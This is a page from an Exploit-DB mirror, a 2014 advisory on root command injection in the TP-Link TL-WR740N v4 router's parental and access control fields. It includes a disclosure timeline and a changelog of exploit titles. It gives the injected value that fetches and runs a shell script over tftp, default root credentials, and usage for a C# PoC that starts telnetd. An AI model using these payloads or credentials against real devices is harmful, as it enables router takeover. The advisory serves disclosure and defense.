bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/34254.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

108 lines
No EOL
5 KiB
Text
Raw Blame History

# Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) arbitrary shell command execution
# Date: 08/03/2014
# Exploit Author: Christoph Kuhl
# Vendor Homepage: http://www.tp-link.com
# Software Link: http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
# Version: FW-Ver. 3.16.6 Build 130529 Rel.47286n
# Tested on: TP-Link TL-WR740N v4
Exploit:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link)
Vulnerability description:
The domain name parameters of the "Parental Control" and "Access
Control" features of the TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build
130529 Rel.47286n) router are prone to arbitrary shell command execution
as root for users who are authenticated against the web interface.
Each shell payload is restricted up to 28 bytes. The "Parental Control"
feature allows you to specify 8 domains (= 8 commands) so you have 8 x
28 = 244 bytes of shell commands. This is sufficient to post-load and
execute a shell script of arbitrary length from a tftp server.
Employing this method one can gain full control over the device when
post-loading a mightier busybox MIPS binary and executing telnetd or
using netcat to connect back. Default login credentials are known to be
root:5up, Admin:5up or ap71:.
Technical Cause:
The web interface and the whole routing logic on the device is
controlled by a single homebrew process (httpd) running as root.
This binary is employing various fopen() and system() calls in order to
configure the device.
One of these calls refers to a script (/tmp/wr841n/parent.sh) being
filled with user input data from the "Parental Control" mask.
...
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls USER INPUT
HERE,return1 -j RETURN
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ANOTHER USER
INPUT HERE,return1 -j RETURN
...
The input data is only poorly checked by some JavaScript functions but
the server accepts most characters. Entering a shell command surrounded
by ';' will result in code execution:
...
iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source
00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ;tftp -gr a
192.168.0.1;,;sh a;,return1 -j RETURN
...
The same goes for the Access Control Feature. The only difference is
that the script name is /tmp/wr841n/accessCtrl.sh.
The attack is persistent until resetting the parental control or access
control settings. After rebooting the device will execute the commands
again.
This vulnerability may or may not affect other TP-Link hardware and
software versions. However it was only tested against TP-Link TL-WR740N
v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) within the local network.
Exploit POC code description:
The exploit tries to load and execute a shell script called 'a' (for
attack) from the specified tftpd server. This is for the circumventing
the length restriction of 28 bytes and the fact that the preloaded
busybox binary is a bit restricted (no netcat and telnetd available).
The 'a' script then loads a mightier busybox (filename busyboxx) binary
from the tftp server specified in that 'a' script (default 192.168.0.1).
It also sets up a more comfortable environment and starts telnetd as
well as a ftp server.
You can then connect to the router via telnet and ftp.
The exploit code is written in C# (.NET 4.5) so you need .NET Framework
4.5 to execute it.
Usage:
ParentalControlExploit.exe [/a | /p] [RouterIp] [RouterWebIfaceUsername]
[RouterWebIfacePassword] [TFTPServerIp]
TP-Link TL-WR740N v4 parental control and access control exploit. 2014
by C. Kuhl.
Options:
/a Use Access Control Exploit
/p Use Parental Control Exploit
[RouterIp] IP of the target to attack (default 192.168.0.1)
[Username] Username of the Webinterface Login (default admin)
[Password] Username of the Webinterface Login (default admin)
[TFTPServer] TFTP Host where the 'a' shell file is hosted for execution
Example: ParentalControlExploit.exe /a 192.168.0.1 admin admin 192.168.0.100
History of the flaw:
07/01/2014 - Found it
07/05/2014 - Notified TP Link via their Online Support Contact
form including detailed description and link to POC exploit
07/14/2014 - Got answer via mail that they could not reproduce the
flaw via the router's web interface and asked for more information.
07/26/2014 - Replied to TP-Link that one cannot reproduce the bug
via the router's web interface due to the javascript "check logic" and
that they need to either employ direct GET requests or use the provided
exploit
07/29/2014 - TP Link states that this was no security flaw because
the attacker had to know the credientials to the webinterface. It was
like giving the key to your flat to a housebreaker.
08/03/2014 - Publication
Reference in a new issue View git blame Copy permalink